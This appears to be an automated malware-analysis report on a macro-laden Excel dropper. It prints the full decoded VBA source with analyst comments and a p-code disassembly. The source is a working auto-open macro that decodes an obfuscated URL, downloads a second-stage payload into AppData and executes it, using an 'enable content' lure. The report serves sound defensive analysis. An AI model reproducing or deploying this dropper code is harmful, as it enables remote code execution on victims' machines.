MALICIOUS
216
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample is an Excel file containing a Workbook_Open VBA macro that is designed to execute automatically when the workbook is opened. This macro uses the URLDownloadToFile API to download a second-stage payload from a hardcoded URL, which is stored in the obfuscated form "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui" and decoded at runtime by the macro's Decrypt() routine, to a file whose name is likewise decoded from the obfuscated string "fyf/ttbb" and placed in the user's AppData directory. Subsequently, it uses ShellExecuteA to execute the downloaded file. The document body prompts the user to enable content, which is a common lure for macro-based malware.
Heuristics 7
-
Reference to URLDownloadToFile API (critical) — SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
-
VBA macros detected (medium, 3 related findings) — OLE_VBA_MACROS: Document contains VBA macro code
-
URLDownloadToFile in VBA (critical) — OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _ ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long -
Workbook_Open macro (low) — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open() -
Environ() call (env variable access) (low) — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb") bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF -
Reference to ShellExecute API (high) — SC_STR_SHELLEXEC: Reference to ShellExecute API
-
Macro/content-enable lure (medium) — SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9618 bytes |
| SHA-256: abdb40e88e155f6c162ac77a05a2a7f3897e88820fed26a88ebdb24d3ccc907e | | | |
Preview script — first 1,000 lines of the extracted script
' Module1: a standard module that carries no executable logic in the visible listing.
Attribute VB_Name = "Module1"
' Empty procedure; nothing in the visible listing calls it.
' Presumably padding so the module looks populated — no effect at runtime.
Sub Dil()
End Sub
' UJFkrkbook: document module whose VB_Base GUID ({00020819-...}) is the one Excel uses
' for the ThisWorkbook module, so this appears to be ThisWorkbook under a random name.
' VB_PredeclaredId = True means the module instance exists as soon as the workbook is
' loaded, which is what lets the Workbook_Open handler below fire automatically.
Attribute VB_Name = "UJFkrkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Decoy API declarations: winmm.dll timer functions that nothing in this listing calls.
' etTime / imeGetTime / meGetTime are suffixes of the real export name timeGetTime.
' NOTE(review): the first two lack PtrSafe while the rest carry it; a Declare without
' PtrSafe does not compile on 64-bit Office, which suggests a 32-bit host is intended — confirm.
Private Declare Function etTime Lib "winmm.dll" () As Long
Private Declare Function timeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long
' Hwclmk is shell32!ShellExecuteA behind a random alias; qxEU uses it to launch the
' downloaded file. Parameters: hwnd, operation, file, parameters, directory, show command.
Private Declare PtrSafe Function Hwclmk Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal mYLnJHkRjU As Long, ByVal YyYkewtQmKCzKcqLzIhcEG As String, _
ByVal nHMUKqzz As String, ByVal yDZhoSgfvyB As String, ByVal tRhZJsuOrwJGpCccD As String, ByVal LXAT As Long) As Long
' nYNiXOdnVVIvWsFTBSE is urlmon!URLDownloadToFileA behind a random alias; qxEU uses it to
' fetch the payload. Parameters: caller, URL, local file name, reserved, status callback.
Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long
' Fourth decoy timer declaration, also never called.
Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long
' Dropper stage: builds a target path under %AppData%, fetches the payload with
' URLDownloadToFileA and launches it with ShellExecuteA. Called only from Workbook_Open.
' The URL and file name are stored obfuscated and decoded by Decrypt() at runtime, so the
' literals below are not the real indicators; decode them before using them as IoCs.
' NOTE(review): the p-code disassembly further down shows the same structure for this
' procedure (six Dims, the two string literals, one 5-argument and one 6-argument call)
' under different identifier names — presumably a disassembler identifier-table offset
' rather than a source/p-code divergence; confirm before reading it as VBA stomping.
Sub qxEU()
Dim pAuMwLKkfkFDfgxSGfgD As String ' decoded download URL
Dim SCNTPJYGHDMjhgYgHDJhjF As String ' decoded payload file name
Dim bsGOPZxsVWDKdlbGBCAFInmhun As String ' full local path of the payload
' The next three locals are declared but never used (filler).
Dim wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd As String
Dim HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD As String
Dim pQkPoFRGDxPMjSekgrIJ As String
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
' %AppData%\<decoded file name>
bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF
pAuMwLKkfkFDfgxSGfgD = Decrypt("fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui")
' URLDownloadToFileA(caller = 0, URL, local file, reserved = 0, callback = 0); the return value is ignored
nYNiXOdnVVIvWsFTBSE 0, pAuMwLKkfkFDfgxSGfgD, bsGOPZxsVWDKdlbGBCAFInmhun, 0, 0
' ShellExecuteA(hwnd = 0, "open", downloaded file, no parameters, no directory, normal window) — runs the payload
Hwclmk 0, "open", bsGOPZxsVWDKdlbGBCAFInmhun, "", vbNullString, vbNormalFocus
End Sub
' Auto-execute entry point: Excel runs this when the workbook is opened (once macros are
' enabled). It only delegates to qxEU, keeping the download/execute logic out of the
' handler that analysts look at first.
Sub Workbook_Open()
qxEU
End Sub
' Chain of nine one-line functions that each only call the next one. Nothing in the
' listing calls the head (DisHp4e1dEwtDO8XRgW), no return value is ever assigned, and the
' final callee FZ4yZPaWVH is not defined in the decompressed source shown. This reads as
' filler meant to inflate and obscure the module; it has no effect on the dropper.
Function DisHp4e1dEwtDO8XRgW() As Currency
Call t7IOznwCrl
End Function
Static Function t7IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
Static Function hx2errEArb() As Double
Call lkYXBK4r3WCbBQoVfs4z78R
End Function
Function lkYXBK4r3WCbBQoVfs4z78R() As Single
Call FZ4yZPaWVH
End Function
' String de-obfuscation used for the URL and the file name: reverses the input, then
' shifts every character code down by one (Chr(AscW(c) - 1)). Returns the decoded string.
' enci is passed ByRef (the VBA default), so the caller's argument is reversed in place.
' bbop, cost and nn are assigned on every iteration but never read — filler.
' The local named AppData is only the output accumulator; it is unrelated to the
' AppData environment variable read in qxEU.
Function Decrypt(enci)
Dim bbop As String
Dim cost As Date
Dim vcninDkMDYSfv
Dim AppData
Dim ikolpliktrUjmM
Dim np As Byte
enci = StrReverse(enci)
For ikolpliktrUjmM = 1 To Len(enci)
vcninDkMDYSfv = Mid(enci, ikolpliktrUjmM, 1)
bbop = ""
cost = 19 / 6 / 2190
nn = 1
AppData = AppData & Chr(AscW(vcninDkMDYSfv) - 1)
Next
Decrypt = AppData
' enc (without the trailing i) is declared nowhere; the module has no Option Explicit, so
' it reads as Empty and the loop presumably never iterates — dead code either way, as the
' body is empty.
For np = 1 To Len(enc)
Next
End Function
' Sheet1 / Sheet2 / Sheet3: worksheet document modules (VB_Base GUID {00020820-...} is
' the one Excel uses for Worksheet modules). They carry attributes only — no code.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_5g3uxr3m
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 911 bytes
' Line #0:
' FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/UJFkrkbook - 9200 bytes
' Line #0:
' FuncDefn (Private Declare Function Workbook Lib "Hwclmk" () As Long)
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Declare Function mYLnJHkRjU Lib "Hwclmk" () As Long)
' Line #4:
' Line #5:
' FuncDefn (Private Declare PtrSafe Function YyYkewtQmKCzKcqLzIhcEG Lib "Hwclmk" () As Long)
' Line #6:
' Line #7:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function yDZhoSgfvyB Lib "oEWrK" (ByVal tRhZJsuOrwJGpCccD As Long, ByVal LXAT As String, ByVal shell32.dll As String, ByVal nYNiXOdnVVIvWsFTBSE As String, ByVal IiWTNgdAVuAwHLZv As String, ByVal xGQK As Long) As Long)
' Line #8:
' Line #9:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function EuZjjimXQXCOOeildBQJt Lib "SCNTPJYGHDMjhgYgHDJhjF" (ByVal beybftDY As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal qxEU As Long, ByVal pAuMwLKkfkFDfgxSGfgD As Long) As Long)
' Line #10:
' Line #11:
' FuncDefn (Private Declare PtrSafe Function bsGOPZxsVWDKdlbGBCAFInmhun Lib "Hwclmk" () As Long)
' Line #12:
' Line #13:
' Line #14:
' FuncDefn (Sub wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd())
' Line #15:
' Dim
' VarDefn HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD (As String)
' Line #16:
' Dim
' VarDefn pQkPoFRGDxPMjSekgrIJ (As String)
' Line #17:
' Dim
' VarDefn Decrypt (As String)
' Line #18:
' Dim
' VarDefn Environ (As String)
' Line #19:
' Dim
' VarDefn vbNullString (As String)
' Line #20:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #21:
' LitStr 0x0008 "fyf/ttbb"
' ArgsLd Workbook_Open 0x0001
' St pQkPoFRGDxPMjSekgrIJ
' Line #22:
' LitStr 0x0007 "AppData"
' ArgsLd DisHp4e1dEwtDO8XRgW$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld pQkPoFRGDxPMjSekgrIJ
' Concat
' St Decrypt
' Line #23:
' Line #24:
' Line #25:
' LitStr 0x0030 "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd Workbook_Open 0x0001
' St HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD
' Line #26:
' Line #27:
' LitDI2 0x0000
' Ld HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall EuZjjimXQXCOOeildBQJt 0x0005
' Line #28:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld t7IOznwCrl
' Ld Dp62rz6kt90kDRkudpcs1fW4
' ArgsCall yDZhoSgfvyB 0x0006
' Line #29:
' EndSub
' Line #30:
' Line #31:
' FuncDefn (Sub Jb8AvPk2VR())
' Line #32:
' Line #33:
' ArgsCall wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd 0x0000
' Line #34:
' EndSub
' Line #35:
' Line #36:
' Line #37:
' FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #38:
' ArgsCall (Call) JxU0xFkI7x 0x0000
' Line #39:
' EndFunc
' Line #40:
' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #41:
' ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000
' Line #42:
' EndFunc
' Line #43:
' FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #44:
' ArgsCall (Call) hx2errEArb 0x0000
' Line #45:
' EndFunc
' Line #46:
' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #47:
' ArgsCall (Call) lkYXBK4r3WCbBQoVfs4z78R 0x0000
' Line #48:
' EndFunc
' Line #49:
' FuncDefn (Function lkYXBK4r3WCbBQoVfs4z78R(id_FFFE As Variant) As Variant)
' Line #50:
' ArgsCall (Call) FZ4yZPaWVH 0x0000
' Line #51:
' EndFunc
' Line #52:
' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #53:
' ArgsCall (Call) DecryptON 0x0000
' Line #54:
' EndFunc
' Line #55:
' FuncDefn (Function DecryptON(id_FFFE As Variant) As Variant)
' Line #56:
' ArgsCall (Call) enci 0x0000
' Line #57:
' EndFunc
' Line #58:
' FuncDefn (Static Function enci(id_FFFE As Double) As Double)
' Line #59:
' ArgsCall (Call) bbop 0x0000
' Line #60:
' EndFunc
' Line #61:
' FuncDefn (Function bbop(id_FFFE As Single) As Single)
' Line #62:
' ArgsCall (Call) cost 0x0000
' Line #63:
' EndFunc
' Line #64:
' Line #65:
' FuncDefn (Function Workbook_Open(AppData, id_FFFE As Variant))
' Line #66:
' Dim
' VarDefn ikolpliktrUjmM (As String)
' Line #67:
' Dim
' VarDefn np (As Date)
' Line #68:
' Dim
' VarDefn StrReverse
' Line #69:
' Dim
' VarDefn nn
' Line #70:
' Dim
' VarDefn Chr
' Line #71:
' Dim
' VarDefn AscW (As Byte)
' Line #72:
' Ld AppData
' ArgsLd enc 0x0001
' St AppData
' Line #73:
' StartForVariable
' Ld Chr
' EndForVariable
' LitDI2 0x0001
' Ld AppData
' FnLen
' For
' Line #74:
' Ld AppData
' Ld Chr
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #75:
' Line #76:
' LitStr 0x0000 ""
' St ikolpliktrUjmM
' Line #77:
' LitDI2 0x0013
' LitDI2 0x0006
' Div
' LitDI2 0x088E
' Div
' St np
' Line #78:
' LitDI2 0x0001
' St _B_str_Environ
' Line #79:
' Ld nn
' Ld StrReverse
' ArgsLd _B_var_nn 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd _B_var_Mid 0x0001
' Concat
' St nn
' Line #80:
' StartForVariable
' Next
' Line #81:
' Line #82:
' Ld nn
' St Workbook_Open
' Line #83:
' Line #84:
' StartForVariable
' Ld AscW
' EndForVariable
' LitDI2 0x0001
' Ld _B_var_Chr
' FnLen
' For
' Line #85:
' Line #86:
' StartForVariable
' Next
' Line #87:
' Line #88:
' EndFunc
' Line #89:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes